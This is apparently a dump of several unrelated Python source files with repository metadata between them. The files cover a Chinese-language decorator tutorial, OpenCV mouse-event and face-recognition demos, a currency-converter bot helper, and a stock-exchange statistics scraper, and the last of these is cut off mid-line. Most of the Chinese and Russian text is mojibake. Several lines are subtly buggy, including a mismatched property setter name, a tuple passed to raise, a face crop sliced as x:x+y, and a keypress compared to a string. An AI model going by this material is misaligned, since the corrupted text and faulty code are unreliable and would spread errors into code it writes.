ณไปปๅก็ไฝฟ็จ็จๅบ็ฑปไธญ๏ผๅฆๆฐๅญฆ่ฎก็ฎใ้่ฟๅฐ็ธๅ
ณๅฝๆฐ็ป็ปๆ็ฑป็้ๆๆนๆณ๏ผไฝฟไปฃ็ ๅๅพๆดๅ ๆ็ป็ปใๆดๅฎนๆ็่งฃใ
@staticmethod: ๅฃฐๆไธไธช้ๆๆนๆณ๏ผๅฏไปฅ้่ฟ็ฑปๅ็ดๆฅ่ฐ็จใ
@property: ไธบPython็ฑป่ฎพ็ฝฎๅค็็จๅบๅ่ฎพ็ฝฎ็จๅบใ
ๅฐไธไธชๆนๆณ่ฝฌๆขไธบๅช่ฏปๅฑๆงใไนๅฏไปฅ็่งฃๆ๏ผๅฐไธไธชๆนๆณๆนๆไบ __getter__ๆนๆณใๅนถไธๅฏไปฅๆฟ่ฟไธชๆนๆณ็ปง็ปญๅฏนๅ้ข็ๆนๆณ่ฟ่ก่ฃ
้ฅฐใ
็จไบๅฏนๅฑๆง่ฟ่กไฟๆค
GettersๅSettersๆฏ้ขๅๅฏน่ฑก็ผ็จ๏ผOOP๏ผไธญ็้่ฆๆฆๅฟตใ
ๅฏนไบ็ฑปไธญ็ๆฏไธชๅฎไพๅ้๏ผgetterๆนๆณ่ฟๅๅ
ถๅผ๏ผ่setterๆนๆณ่ฎพ็ฝฎๆๆดๆฐๅ
ถๅผใ้ดไบๆญค๏ผGettersๅSettersๅๅๅซ็งฐไธบAccessorsๅMutatorsใ
ๅฎไปฌ็จไบไฟๆคๆฐๆฎไธ่ขซ็ดๆฅๆๅค่ฎฟ้ฎๆไฟฎๆนใ
ไธๅ็OOP่ฏญ่จๆไธๅ็ๆบๅถๆฅๅฎไน่ทๅๅจgettersๅsettersใๅจPythonไธญ๏ผๅฏไปฅ็ฎๅๅฐไฝฟ็จ@property่ฃ
้ฅฐๅจใ
__getter__ __setter__
้่ฟproperty่ฃ
้ฅฐๅ๏ผๅฏไปฅ็ดๆฅๅๅ้๏ผไนๅฏไปฅ้่ฟๅฝๆฐๅๅ้ใๅฝๆฐไธ่ฝๅ ()
@abstractmethod: ๅฃฐๆไธไธชๆฝ่ฑกๆนๆณ๏ผๅญ็ฑปๅฟ
้กปๅฎ็ฐๅฎใ
@wraps: ็จไบไฟ็ๅๅงๅฝๆฐ็ๅ
ๆฐๆฎ๏ผๅฆๅฝๆฐๅใๆณจ้็ญ๏ผใ
ๅๅปบ่ฃ
้ฅฐๅจ็ๆถๅไฝฟ็จใ็จไบไฟ็ๅๅงๅฝๆฐ็ๅ
ๆฐๆฎ๏ผๅฆๅฝๆฐๅใๆณจ้็ญ๏ผใ
@lru_cache๏ผๅฉ็จ็ผๅญๆ้็จๅบใๆฏๆ้Pythonๅฝๆฐๆ็ฎๆ็ๆนๆณ
ๆญค่ฃ
้ฅฐๅจๅฐๅฝๆฐ็็ปๆๆพๅ
ฅ็ผๅญ๏ผไพๅ็ปญๅ
ทๆ็ธๅๅๆฐ็ๅฝๆฐ่ฐ็จ๏ผๆ ้ๅๆฌกๆง่กๅ
ทๆ็ธๅๅๆฐ็ๅฝๆฐใ
@total_ordering: ๅกซๅ
็ผบๅคฑๆๅบๆนๆณ็็ฑป่ฃ
้ฅฐๅจ
ๅฝๆฐๅทฅๅ
ทๆจกๅไธญ็@total_sordeng่ฃ
้ฅฐๅจไธบ้ขๅฎไนPython็ฑป็ๆ็ผบๅคฑๆฏ่พๆนๆณใ
ๅจ็ฑปไธญๆฒกๆๅฏน__ge__ใ__gt__ๅ__le__ๆนๆณ่ฟ่กๅฎไนใๅฏน่ฏฅ็ฑป็ๅฏน่ฑก่ฟ่กๆฏ่พๆฏไผๆ้ฎ้ขใ่ฟไธช่ฃ
้ฅฐๅจไผ่กฅๅ
็ผบๅคฑ็ๆฏ่พๆนๆณ
ไธไบๆง็็ฑปๅฏ่ฝๆชๅ
ๅๅฎไนๆฏ่พๆนๆณ๏ผๅฐ@total_ordering่ฃ
้ฅฐๅจๆทปๅ ๅฐๅ
ถไธญไนๅ๏ผๅ็ปญ็ไฝฟ็จๆดๅ ๅฎๅ
จใ
@contextmanager:ๅฎๅถ็่ฏญๅข็ฎก็ๅจ
ๅฏไปฅไฝฟ็จwith่ฏญๅฅๆๅผๆไปถ๏ผๅจๅๅ
ฅไนๅๅฐ่ชๅจๅ
ณ้ญใๆ ้ๆพๅผๅฐ่ฐ็จf.close๏ผ๏ผๅฝๆฐๆฅๅ
ณ้ญ่ฏฅๆไปถใ
@cached_property:ๅฐๆนๆณ็็ปๆไฝไธบๅฑๆงๆพๅ
ฅ็ผๅญ
Python 3.8็ๅฝๆฐๅทฅๅ
ทๆจกๅๅผๅ
ฅไบไธไธชๆฐ็ๅ่ฝๅผบๅคง็่ฃ
้ฅฐๅจ-@cached_property๏ผๅฎๅฐ็ฑป็ๆนๆณ่ฝฌๆขไธบไธไธชๅฑๆง๏ผ่ฎก็ฎๅบ่ฏฅๅฑๆง็ๅผไนๅ๏ผๅฐๅ
ถไฝไธบๅฎไพ็ๆฎ้ๅฑๆงๆพๅ
ฅ็ผๅญใ
@dataclass:็จๆดๅฐ็ไปฃ็ ๅฎไนไธ็จ็ฑป
๏ผๅจPython3.7ไธญๅผๅ
ฅ๏ผๅฏไปฅ่ชๅจไธบไธไธช็ฑป็ๆๅ ็งไธ็จ็ๆนๆณ๏ผๅฆ__init__ใ__repr__ใ__eq__ใ__lt__็ญใ
@atexit.register:ๆณจๅไธไธช็จๅบๆญฃๅธธ็ปๆญข็ๅฝๆฐ
atexitๆจกๅ็@register่ฃ
้ฅฐๅจๅ
่ฎธๅจPython่งฃ้ๅจ้ๅบๆถๆง่กไธไธชๅฝๆฐใ
@login_required: ็จไบ้ๅถ้่ฆ็จๆท็ปๅฝๆ่ฝ่ฎฟ้ฎ็่งๅพๅฝๆฐใ
@cache: ็ผๅญๅฝๆฐ็็ปๆ๏ผ้ฟๅ
้ๅค่ฎก็ฎใ
@retry: ๅจๅ็้่ฏฏๆถ่ชๅจ้่ฏไปฃ็ ๅไธๅฎๆฌกๆฐใ
้่ฆ่ชๅทฑๅฎไน
ๅฝๆฐ
ๅฝๆฐๅฏไปฅ่ตๅผ
ๅฝๆฐไธญๅฏไปฅๅฎไนๅฝๆฐ(ๅฝๆฐไธญๅฎไน็ๅฝๆฐ๏ผๅจๅฝๆฐๅคๆ ๆณ่ฎฟ้ฎ)
ๅฝๆฐๅฏไปฅ่ฟๅๅฝๆฐ
funcName() ๆง่กๅฝๆฐ
funcName()
funcName ๆๅฝๆฐๆดไฝ่ตๅผ็ปๅฆๅคไธไธชๅ้
a1 = funcName
a1()
"""
"""
ไธๅ็ๅฏน่ฑก
"""
"""
ๅฝๆฐ่ตๅผไฝฟ็จๅฎไพ
"""
def hi(name="renxw"):
return "hi " + name
"""
ๅฝๆฐไธญๅฎไนๅฝๆฐ
ๅฝๆฐไธญๅฎไน็ๅฝๆฐ๏ผๅจๅฝๆฐๅคไธ่ฝ่ขซ่ฎฟ้ฎ
"""
def hiFun01(name="renxw"):
print("now you are inside the hiFun01() function")
def hiFun02():
return "now you are in the hiFun02() function"
def hiFun03():
return "now you are in the hiFun03() function"
print(hiFun02())
print(hiFun03())
print("now you are back in the hiFun01() function")
"""
ไปๅฝๆฐไธญ่ฟๅๅฝๆฐ
"""
def hiFun04(name="renxw"):
print("now you are inside the hiFun04() function")
def hiFun02():
return "now you are in the hiFun02() function"
def hiFun03():
return "now you are in the hiFun03() function"
if name == "renxw":
return hiFun02
else:
return hiFun03
"""
ๅฝๆฐ็ปไน
"""
def hiFunTest():
print("ๅฝๆฐ่ตๅผ")
print(hi())
hi01 = hi
print(hi01())
# ๅฏไปฅๅ ้คhi01๏ผๅ ้คhiๆฅ้
# del hi01
# del hi
# print(hi())
# print(hi01())
print("ๅจๅฝๆฐไธญๅฎไนๅฝๆฐ")
hiFun01()
print("ไปๅฝๆฐไธญ่ฟๅๅฝๆฐ")
hiFun05 = hiFun04()
print(hiFun05())
"""
่ฃ
้ฅฐๅจ็ปไน
"""
"""
่ฃ
้ฅฐๅจๅฝๆฐๅฎไน
functools.wraps ๆๆ่ฃ
้ฅฐ็ๅฝๆฐ
@wraps(a01Fun)
ๆฅๅไธไธชๅฝๆฐๆฅ่ฟ่ก่ฃ
้ฅฐ๏ผๅนถๅ ๅ
ฅไบๅคๅถๅฝๆฐๅ็งฐใๆณจ้ๆๆกฃใๅๆฐๅ่กจ็ญๅ่ฝใ
่ฟๅฏไปฅ่ฎฉๆไปฌๅจ่ฃ
้ฅฐๅจ้้ข่ฎฟ้ฎๅจ่ฃ
้ฅฐไนๅ็ๅฝๆฐ็ๅฑๆง
"""
def a01Decorator(a01Fun):
@wraps(a01Fun)
def wrapTheFunction():
print("I am doing some boring work before executing a01Fun()")
a01Fun()
print("I am doing some boring work after executing a01Fun()")
return wrapTheFunction
"""
@ๆๆ่ฃ
้ฅฐๅจ
ๅจๆๆ่ฃ
้ฅฐๅจๅ๏ผๅจไฝฟ็จๅฝๆฐ็ๆถๅๅฐฑๅฏไปฅ็ดๆฅไฝฟ็จ่ฃ
้ฅฐๅ็ๅ่ฝ๏ผไธ้่ฆๅไฝฟ็จ่ฃ
้ฅฐๅจ่ฟ่กๅ
่ฃ
่ตๅผไบ
"""
@a01Decorator
def a02Fun():
print("I am the function which needs some decoration to remove my foul smell")
"""
่ฃ
้ฅฐๅจ็ปไน
"""
def decoratorLearn():
a02Fun()
print(a02Fun.__name__)
# a03Fun = a01Decorator(a02Fun)
# a03Fun()
# print(a03Fun.__name__)
return
"""
ๅ
็ฝฎ่ฃ
้ฅฐๅจ็ปไน
"""
class IterClass:
def __init__(self):
self._score = 0
@property
def score1(self):
return self._score
@score1.setter
def score(self, s):
if 0 <= s <= 100:
self._score = s
else:
raise Exception("ๅๆฐๅคชๅคง๏ผๅชๅ
่ฎธ0-100")
@dataclass
class Point:
"""@dataclass่ฃ
้ฅฐๅจ็ปไน """
x: float
y: float
def point_func():
point = Point(1.0, 2.0)
print(point)
"""่ชๅฎไน่ฃ
้ฅฐๅจretry"""
def retry(max_retries=3, timeout=1):
"""
ๅฎไน่ฃ
้ฅฐ๏ผ็จไบๅฝๆฐ้่ฏ๏ผๅ็ญๅพ
้่ฏๆถ้ฟใ
่ฟ้้ข็ๅๆฐๆถ่ฃ
้ฅฐๅจๅฝๆฐๆฌ่บซ็ๅๆฐ
:param max_retries: ๆๅคง้่ฏๆฌกๆฐ
:param timeout: ่ฎพ็ฝฎ่ถ
ๆถ้่ฏๆถ้ฟ
:return:
"""
def decorator(func):
"""
ๅฎไน่ฃ
้ฅฐๅจๅๅฐ่ฃ
้ฅฐๅจ่ฟๅ
:param func: ไปฅๅฝๆฐๅผ็ผ็จ็ๆนๅผ๏ผไฝฟ็จๅๆฐๆฅๆถ่ขซ่ฃ
้ฅฐๅฝๆฐ็ๅฝๆฐๅ๏ผๅจ่ฃ
้ฅฐๅจไธญไฝฟ็จ func() ่ฟ่กๆง่กๅฝๆฐ
:return: wrapper(่ขซ่ฃ
้ฅฐไนๅ็ๅฝๆฐๅ๏ผๅจๅฝๆฐ่ขซ่ฃ
้ฅฐไนๅ๏ผ่ฐ็จๅซ่ฃ
้ฅฐๅฝๆฐ็ๆถๅ๏ผๅฎ้
ไธ่ฐ็จ็ๅฐฑๆฏwrapperๅฝๆฐ)
"""
@wraps(func)
def wrapper(*args, **kwargs):
"""
ๅฎไน่ขซ่ฃ
้ฅฐๅฝๆฐ๏ผ่ขซ่ฃ
้ฅฐไนๅ็ๅฝๆฐๅ่ฝ
่ฟ้็ๅๆฐๆถ่ขซ่ฃ
้ฅฐๅฝๆฐ็ๅๆฐ
@wraps(func): ่ฟ้ๅฏไปฅไฝฟ็จwraps็จๆฅๆ ่ฏ่ฃ
้ฅฐๅจ๏ผๅนถไธๆฅๆถfuncๅฝๆฐๅใไธๅไนๅฏไปฅ
@wrapsๆฅๅไธไธชๅฝๆฐๆฅ่ฟ่ก่ฃ
้ฅฐ๏ผๅนถๅ ๅ
ฅไบๅคๅถๅฝๆฐๅ็งฐใๆณจ้ๆๆกฃใๅๆฐๅ่กจ็ญ็ญ็ๅ่ฝใ่ฟๅฏไปฅ่ฎฉๆไปฌๅจ่ฃ
้ฅฐๅจ้้ข่ฎฟ้ฎๅจ่ฃ
้ฅฐไนๅ็ๅฝๆฐ็ๅฑๆงใ
:param args: (ๅฝขๅ)(ๅ
็ป)็จไบๆฅๆถ่ขซ่ฃ
้ฅฐๅฝๆฐ็ๆๆ้ๅ
ณ้ฎๅญๅๆฐ
:param kwargs: (ๅฝขๅ)(ๅญๅ
ธ)็จไบๆฅๆถ่ขซ่ฃ
้ฅฐๅฝๆฐ็ๆๆๅ
ณ้ฎๅญๅๆฐ
:return:
"""
"""ไฝฟ็จๅพช็ฏ็ๆนๅผๅฏน่ขซ่ฃ
้ฅฐๅฝๆฐ่ฟ่ก้่ฏ"""
retries = 0
exce_type = 0
while retries < max_retries:
try:
"""
args: (ๅฎๅ)ๅฐ้่ฟwrapperๅฝๆฐๆฅๆถๅฐ็่ขซ่ฃ
้ฅฐๅฝๆฐ็้ๅ
ณ้ฎๅญๅๆฐ็ๅๆฐ้ๅ(ๅ
็ป)๏ผไฝฟ็จ*่ฟ่กๅฑๅผ๏ผๅฐๅ
ถไธญๆๆๅ
็ด ๅ็ฌไผ ้็ป่ขซ่ฃ
้ฅฐๅฝๆฐ
kwargs: (ๅฎๅ)ๅฐ้่ฟwrapperๅฝๆฐๆฅๆถๅฐ็่ขซ่ฃ
้ฅฐๅฝๆฐ็ๅ
ณ้ฎๅญๅๆฐ็ๅๆฐ้ๅ(ๅญๅ
ธ)๏ผไฝฟ็จ**่ฟ่กๅฑๅผ๏ผๅฐๅ
ถไธญๆๆๅ
็ด (้ฎ:ๅผๅฏน)ๅ็ฌไผ ้็ป่ขซ่ฃ
้ฅฐๅฝๆฐ
1ใๅฐ่ขซ่ฃ
้ฅฐๅฝๆฐๆๆๅๆฐไผ ้็ป่ขซ่ฃ
้ฅฐๅฝๆฐ
2ใๆง่ก่ขซ่ฃ
้ฅฐๅฝๆฐ
3ใ่ฟๅ่ขซ่ฃ
้ฅฐๅฝๆฐ็returnๅผ(่ขซ่ฃ
้ฅฐๅฝๆฐ็่ฟๅๅผ้่ฆๅ็ฌ่ฟๅ๏ผ่ฆไธ็ถๆ ๆณ่ขซๅผ็จ)
ๆณจๆ็น๏ผ
ๅฆๆfuncๆง่กๆฒกๆๅผๅธธ๏ผๅฐฑไผ็ดๆฅๆง่กreturn่ฏญๅฅๅฐfunc็ปๆ่ฟๅ๏ผ้ฃๅฐฑไธไผๅ่ฟ่กๅพช็ฏไบใ่ไธไผๅจfuncๆญฃๅธธ็ๆ
ๅตไธ่ฟๅฐfuncๅพช็ฏๆง่กไธๆฌก
"""
return func(*args, **kwargs)
except BaseException as e:
"""้่ฏๆฌกๆฐ+1"""
retries += 1
"""ๆๅๅคฑ่ดฅๆถ๏ผๅฐๅคฑ่ดฅๅๅ ่ฟ่กไฟๅญ๏ผ่ฟ่ก่พๅบ๏ผ"""
exce_type = e if retries == max_retries else None
"""่พๅบๅคฑ่ดฅๆฅๅฟ"""
print(f"ๆง่ก {func.__name__} ๅคฑ่ดฅ๏ผๆญฃๅจ่ฟ่ก็ฌฌ {retries} ๆฌก้่ฏ๏ผ")
"""ๅคฑ่ดฅ้่ฏ๏ผ็ญๅพ
ๆถ้ด"""
time.sleep(timeout)
"""
ๆ็ปๅคฑ่ดฅๅๅฐๅผๅธธๆๅบ๏ผๅนถไธๅฐๅคฑ่ดฅไฟกๆฏ่ฟ่กๆ็คบ๏ผ
ๅผๅธธๆๅบ็ๆถๅไฝฟ็จไนๅๅญๅจๅฅฝ็ๅผๅธธ้ๅ๏ผ่ทๅๅผๅธธ็ฑปๅ๏ผๅ็กฎ็่ฟ่กๅผๅธธไฟกๆฏ่พๅบ
"""
raise exce_type.__class__(f"ๆง่ก {func.__name__} ๅคฑ่ดฅ๏ผๅทฒ่พพๅฐๆๅคง้่ฏๆฌกๆฐ๏ผๆ็ป็ๅคฑ่ดฅๅๅ ๆฏ {exce_type}๏ผ")
"""ๅฝๆฐๅผ็ผ็จ:ๅฐ่ขซ่ฃ
้ฅฐๅจ่ฃ
้ฅฐๅ็็ๅฝๆฐๅ่ฟๅ"""
return wrapper
"""ๅฝๆฐๅผ็ผ็จ:ๅฐ่ฃ
้ฅฐๅจๅฝๆฐ็ๅฝๆฐๅ่ฟๅ"""
return decorator
@retry(max_retries=3, timeout=1)
def retry_test():
"""
@retry: ไฝฟ็จ่ฃ
้ฅฐๅจretryๅฏนๅฝๆฐ่ฟ่ก่ฃ
้ฅฐ
max_retries: ไผ ้็ป่ฃ
้ฅฐๅจ็ๅๆฐ
timeout: ไผ ้็ป่ฃ
้ฅฐๅจ็ๅๆฐ
:return:
"""
print("retryๆต่ฏ")
raise(IOError, "ไธปๅจๆๅบๅผๅธธ๏ผ็จไบ่ฃ
้ฅฐๅจๆต่ฏ๏ผ")
return 1
@retry(max_retries=10, timeout=3)
def sum_num(x, y):
a = x + y
# raise (IOError, "ไธปๅจๆๅบๅผๅธธ๏ผ็จไบ่ฃ
้ฅฐๅจๆต่ฏ๏ผ")
return a
"""
้ๅฝ็ปไน
x! x็้ถไน็ๅฎ็ฐ
"""
def factorial(x):
if x == 1:
return 1
else:
return x * factorial(x - 1)
"""
้ๅฝ็ปไน
"""
def recursionLearn():
print(factorial(10))
if __name__ == "__main__":
# print("่ฟญไปฃๅจ็ปไน ")
# mapLearn()
# print("็ๆๅจ็ปไน ")
# yieldLearn()
# print("ๅฝๆฐๅผ็ผ็จ้ซ้ถๅฝๆฐ-map็ปไน ")
# mapLearn()
# print("ๅฝๆฐๅผ็ผ็จ้ซ้ถๅฝๆฐ-filter็ปไน ")
# filterLearn()
# print("ๅฝๆฐๅผ็ผ็จ้ซ้ถๅฝๆฐ-reduce็ปไน ")
# reduceLearn()
# print("ๅฝๆฐ็ปไน ")
# hiFunTest()
# print("่ฃ
้ฅฐๅจ็ปไน ")
# decoratorLearn()
print("ๅ
็ฝฎ่ฃ
้ฅฐๅจ็ปไน ")
ic = IterClass()
ic.score = 10
print(ic.score)
print(ic.score1)
ic.score = 100
print(ic.score)
print(ic.score1)
point_func()
# print("้ๅฝ็ปไน ")
# recursionLearn()
|
renxiaowei-1991/pythonLearn
|
a01PythonLearn/package/b01PythonLearn/c23ClassHighLearn.py
|
c23ClassHighLearn.py
|
py
| 24,298
|
python
|
zh
|
code
| 0
|
github-code
|
6
|
37176092039
|
import numpy as np
import cv2
# Check available mouse events available with opencv library
# events = [i for i in dir(cv2) if 'EVENT' in i]
# print(events)
# General Callback function used for handling mouse events
def click_event(event, x, y, flags, param):
# Show x and y coordinate
if event == cv2.EVENT_LBUTTONDOWN:
print(x, ', ', y)
font = cv2.FONT_HERSHEY_SIMPLEX
strXY = str(x) + ', ' + str(y)
cv2.putText(img, strXY, (x, y), font, .5, (255, 255, 0), 2)
cv2.imshow('image', img)
# Show B, G and R channel
if event == cv2.EVENT_RBUTTONDOWN:
blue = img[y, x, 0]
green = img[y, x, 1]
red = img[y, x, 2]
font = cv2.FONT_HERSHEY_SIMPLEX
strBGR = str(blue) + ', ' + str(green) + ', ' + str(red)
cv2.putText(img, strBGR, (x, y), font, .5, (0, 255, 255), 2)
cv2.imshow('image', img)
# Create image from numpy
# img = np.zeros((512, 512, 3), np.uint8)
img = cv2.imread('data/images/messi.jpg')
img = cv2.resize(img, (512, 512))
# 'image' is windows title
cv2.imshow('image', img)
# setMouseCallback calls Function click_event
cv2.setMouseCallback('image', click_event)
cv2.waitKey(0)
cv2.destroyAllWindows()
|
sbhrwl/object_detection
|
src/opencv/mouse_events/handle_mouse_event.py
|
handle_mouse_event.py
|
py
| 1,226
|
python
|
en
|
code
| 0
|
github-code
|
6
|
8101165169
|
import requests
import json
from config import keys
class ConvertionException(Exception):
pass
class CryptoConverter:
@staticmethod
def get_price(quote: str, base: str, amount: str):
if quote == base:
raise ConvertionException(f'ะั ะฒะฒะตะปะธ ะพะดะธะฝะฐะบะพะฒัะต ะฒะฐะปััั {base}.')
try:
quote_ticker = keys[quote]
except KeyError:
raise ConvertionException(f'ะะต ัะดะฐะปะพัั ะพะฑัะฐะฑะพัะฐัั ะฒะฐะปััั {quote}')
try:
base_ticker = keys[base]
except KeyError:
raise ConvertionException(f'ะะต ัะดะฐะปะพัั ะพะฑัะฐะฑะพัะฐัั ะฒะฐะปััั {base}')
try:
amount = float(amount)
except ValueError:
raise ConvertionException(f'ะะต ัะดะฐะปะพัั ะพะฑัะฐะฑะพัะฐัั ะบะพะปะปะธัะตััะฒะพ {amount}.')
r = requests.get(f'https://min-api.cryptocompare.com/data/price?fsym={quote_ticker}&tsyms={base_ticker}')
total_base = json.loads(r.content)
new_price = total_base[keys[base]] * amount
new_price = round(new_price, 3)
message = f"ะฆะตะฝะฐ {amount} {keys[quote]} ะฒ {keys[base]} : {new_price}"
return message
|
voxvt/botexam
|
utils.py
|
utils.py
|
py
| 1,270
|
python
|
ru
|
code
| 0
|
github-code
|
6
|
70968292347
|
import cv2
import numpy as numpy
import os
detector = cv2.CascadeClassifier('haarcascade_frontalface_alt.xml')
recognizer = cv2.face.LBPHFaceRecognizer_create()
recognizer.read("trainer/trainer.yml")
font = cv2.FONT_HERSHEY_SIMPLEX
id = 0
name = ['none', 'Godswill', 'Ebere', 'Godswill', 'handle']
cap = cv2.VideoCapture(0)
while True:
ret, frame = cap.read()
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
faces = detector.detectMultiScale(gray, 1.1, 2)
for (x,y,w,h) in faces:
cv2.rectangle(frame, (x,y), (x+w, y+h), (255, 0, 0), 3)
id, confidence = recognizer.predict(gray[y:y+h, x:x+y])
if (confidence <= 100):
id = name[id]
confidence = "{0}%".format(round(100-confidence))
else:
id = "Unknown"
confidence = "{}%".format(round(100-confidence))
cv2.putText(frame, str(id), (x+5, y-5), font, 1, (255, 0, 0), 2)
cv2.putText(frame, str(confidence), (x+5, y+h-5), font, 1, (255, 0, 0), 2)
cv2.imshow("Frame", frame)
k = cv2.waitKey(30) & 0xff
if k == "q":
break
cap.release()
cv2.destroyAllWindows()
|
awesomegusS/cv
|
recognizer.py
|
recognizer.py
|
py
| 1,158
|
python
|
en
|
code
| 0
|
github-code
|
6
|
21141233312
|
import datetime
import json
import os
import time
import pandas as pd
import requests
from mystockdata import config, db
from mystockdata.db import DatetimeIndexMixin, PrefixedDfDb
from mystockdata.exceptions import HistoryDataError
class ShSeDb(DatetimeIndexMixin, PrefixedDfDb):
prefix = 'sh_se_'
class CybSeDb(DatetimeIndexMixin, PrefixedDfDb):
prefix = 'cyb_se_'
class SzSeDb(DatetimeIndexMixin, PrefixedDfDb):
prefix = 'sz_se_'
class SzzbSeDb(DatetimeIndexMixin, PrefixedDfDb,):
prefix = 'szzb_se_'
class ZxqySeDb(DatetimeIndexMixin, PrefixedDfDb, ):
prefix = 'zxqy_se_'
class SSE:
sedb = ShSeDb()
def read_cache(self):
df = self.sedb.read()
return df
def write_cache(self, df):
df = self.sedb.save(df)
def get_sse_overview_day(self):
'''
source: http://www.sse.com.cn/market/stockdata/overview/day/
'''
def _fetch(date):
url = ('http://query.sse.com.cn/marketdata/tradedata',
'/queryTradingByProdTypeData.do?jsonCallBack=jsonpCallback74321',
'&searchDate=[DAY]&prodType=gp&_=1456558103149')
headers = {
'Host': 'www.sse.com.cn',
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36',
'Referer': 'http://www.sse.com.cn/market/stockdata/overview/day/',
}
real_url = ''.join(url).replace('[DAY]', date.strftime("%Y-%m-%d"))
rst = requests.get(url=real_url, headers=headers).text
json_str = rst[19:len(rst) - 1]
rst_list = json.loads(json_str)
rst_list = rst_list['result']
headers = ['istVol', 'SH_profitRate1', 'SH_negotiableValue1', 'SH_trdAmt1', 'SH_trdVol1', 'SH_trdTm1',
'A_istVol', 'A_profitRate1', 'A_negotiableValue1', 'A_trdAmt1', 'A_trdVol1', 'A_trdTm1',
'B_istVol', 'B_profitRate1', 'B_negotiableValue1', 'B_trdAmt1', 'B_trdVol1', 'B_trdTm1']
tmp_dict = dict()
for key, value in rst_list[0].items():
tmp_dict['A_' + key] = value if value else None
for key, value in rst_list[1].items():
tmp_dict['B_' + key] = value if value else None
for key, value in rst_list[2].items():
tmp_dict['SH_' + key] = value if value else None
return pd.DataFrame([tmp_dict, ], index=[date, ])
def _fetch_dates(begin, end, to_df=True):
tmp = []
print(begin, end)
dates = pd.date_range(begin, end)
if len(dates) == 1:
return None
for date in dates:
tmp.append(_fetch(date))
# print(tmp[-1])
if len(dates) > 1:
print('sleep')
time.sleep(0.5)
# print(pd.concat(tmp))
return pd.concat(tmp)
cache_df = self.read_cache()
if cache_df is None or cache_df.empty:
raise HistoryDataError()
else:
start = max(cache_df.index) + datetime.timedelta(days=-1)
new_df = _fetch_dates(
start, datetime.datetime.now())
if new_df is not None:
cache_df = cache_df.drop(new_df.index, errors='ignore')
df = pd.concat([cache_df, new_df])
if len(df) > len(cache_df):
self.write_cache(df)
return df
class SZSE:
dbs = {'sz': SzSeDb(), 'cyb': CybSeDb(),
'zxqy': ZxqySeDb(), 'szzb': SzzbSeDb()}
def read_cache(self, category):
df = self.dbs[category].read()
return df
def write_cache(self, df, category):
df = self.dbs[category].save(df)
def get_szse_overview_day(self, category):
'''
source: http://www.szse.cn/main/marketdata/tjsj/jbzb/
'''
def _fetch(date, category):
urls = {
'sz':
('http://www.szse.cn/szseWeb/ShowReport.szse?',
'SHOWTYPE=EXCEL&CATALOGID=1803&txtQueryDate=%s&ENCODE=1&TABKEY=tab1'),
# ๆทฑๅณไธปๆฟ
'szzb':
('http://www.szse.cn/szseWeb/ShowReport.szse?',
'SHOWTYPE=EXCEL&CATALOGID=1803&txtQueryDate=%s&ENCODE=1&TABKEY=tab2'),
# ไธญๅฐไผไธๆฟ
'zxqy':
('http://www.szse.cn/szseWeb/ShowReport.szse?',
'SHOWTYPE=EXCEL&CATALOGID=1803&txtQueryDate=%s&ENCODE=1&TABKEY=tab3'),
# ๅไธๆฟ
'cyb':
('http://www.szse.cn/szseWeb/ShowReport.szse?',
'SHOWTYPE=EXCEL&CATALOGID=1803&txtQueryDate=%s&ENCODE=1&TABKEY=tab4')}
df = pd.read_html(''.join(urls[category]) % date.strftime(
"%Y-%m-%d"), encoding='gbk', header=0)[0]
if df.columns[0] == 'ๆฒกๆๆพๅฐ็ฌฆๅๆกไปถ็ๆฐๆฎ๏ผ':
return None
if category in ('szzb', 'cyb', 'zxqy'):
del df['ๆฏไธๆฅๅขๅ']
del df['ๆฌๅนดๆ้ซ']
del df['ๆ้ซๅผๆฅๆ']
if category == 'sz':
del df['ๆฏไธๆฅๅขๅ']
del df['ๅน
ๅบฆ%']
del df['ๆฌๅนดๆ้ซ']
del df['ๆ้ซๅผๆฅๆ']
df = pd.pivot_table(df, columns='ๆๆ ๅ็งฐ')
df.index = pd.DatetimeIndex([date.strftime("%Y-%m-%d")])
return df
def _fetch_dates(begin, end, category):
tmp = []
print(begin, end)
dates = pd.date_range(begin, end)
if len(dates) == 1:
return None
for date in dates:
tmp.append(_fetch(date, category))
if len(dates) > 1:
print('sleep')
time.sleep(0.5)
return pd.concat(tmp)
cache_df = self.read_cache(category)
if cache_df is None or cache_df.empty:
raise HistoryDataError()
else:
start = max(cache_df.index) + datetime.timedelta(days=-1)
new_df = _fetch_dates(start, datetime.datetime.now(), category)
if new_df is not None:
cache_df = cache_df.drop(new_df.index, errors='ignore')
df = pd.concat([cache_df, new_df])
if len(df) > len(cache_df):
self.write_cache(df, category)
return df
class SE:
@classmethod
def get_overview_day_field(cls, f_sha, f_shb, f_sh, f_sz, f_cyb, f_zxqy, f_szzb):
sh, sz, cyb, zxqy, szzb = ShSeDb(), SzSeDb(), CybSeDb(), ZxqySeDb(), SzzbSeDb()
sh = sh.read(columns=[f_sha, f_shb, f_sh])
sh.columns = ['SHA', 'SHB', 'SH']
sz = sz.read(columns=[f_sz])
sz.columns = ['SZ']
cyb = cyb.read([f_cyb])
cyb.columns = ['CYB']
zxqy = zxqy.read([f_zxqy])
zxqy.columns = ['ZXQY']
szzb = szzb.read([f_szzb])
szzb.columns = ['SZZB']
df = pd.concat([sh, sz, cyb, zxqy, szzb, ], axis=1)
df = df.fillna(method='bfill')
return df
@classmethod
def get_pe(cls):
return cls.get_overview_day_field('A_profitRate1', 'B_profitRate1', 'SH_profitRate1',
'่ก็ฅจๅนณๅๅธ็็', 'ๅนณๅๅธ็็(ๅ)', 'ๅนณๅๅธ็็(ๅ)', 'ๅนณๅๅธ็็(ๅ)',)
@classmethod
def get_market_val(cls):
df = cls.get_overview_day_field('A_marketValue1', 'B_marketValue1', 'SH_marketValue1',
'่ก็ฅจๆปๅธๅผ๏ผๅ
๏ผ', 'ไธๅธๅ
ฌๅธๅธไปทๆปๅผ(ๅ
)', 'ไธๅธๅ
ฌๅธๅธไปทๆปๅผ(ๅ
)', 'ไธๅธๅ
ฌๅธๅธไปทๆปๅผ(ๅ
)',)
df[['SZ', 'CYB', 'ZXQY']] = df[['SZ', 'CYB', 'ZXQY']] / 100000000
return df
@classmethod
def get_negotiable_val(cls):
df = cls.get_overview_day_field('A_negotiableValue', 'B_negotiableValue', 'SH_negotiableValue',
'่ก็ฅจๆต้ๅธๅผ๏ผๅ
๏ผ', 'ไธๅธๅ
ฌๅธๆต้ๅธๅผ(ๅ
)', 'ไธๅธๅ
